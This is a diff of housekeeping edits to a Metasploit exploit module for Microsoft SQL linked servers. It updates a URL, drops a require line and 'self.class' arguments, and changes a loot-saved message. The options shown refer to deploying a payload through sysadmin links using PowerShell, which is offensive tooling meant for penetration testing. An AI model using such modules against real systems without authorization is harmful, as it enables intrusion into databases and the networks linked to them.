@@ -1,10 +1,8 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
-require 'msf/core'
 require 'msf/core/exploit/mssql_commands'
 
 class MetasploitModule < Msf::Exploit::Remote
@@ -64,12 +62,12 @@ class MetasploitModule < Msf::Exploit::Remote
         OptBool.new('DEPLOY',       [false, 'Deploy payload via the sysadmin links', false]),
         OptString.new('DEPLOYLIST', [false,'Comma seperated list of systems to deploy to']),
         OptString.new('PASSWORD',   [true, 'The password for the specified username'])
-      ], self.class)
+      ])
 
     register_advanced_options(
       [
         OptString.new('POWERSHELL_PATH', [true, 'Path to powershell.exe', "C:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe"])
-      ], self.class)
+      ])
   end
 
   def exploit
@@ -260,7 +258,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if (save_loot=="yes")
       filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_linked_servers.csv"
       path = store_loot("crawled_links", "text/plain", datastore['RHOST'], linked_server_table.to_csv, filename, "Linked servers",this_service)
-      print_status("Results have been saved to: #{path}")
+      print_good("Results have been saved to: #{path}")
     end
   end
 
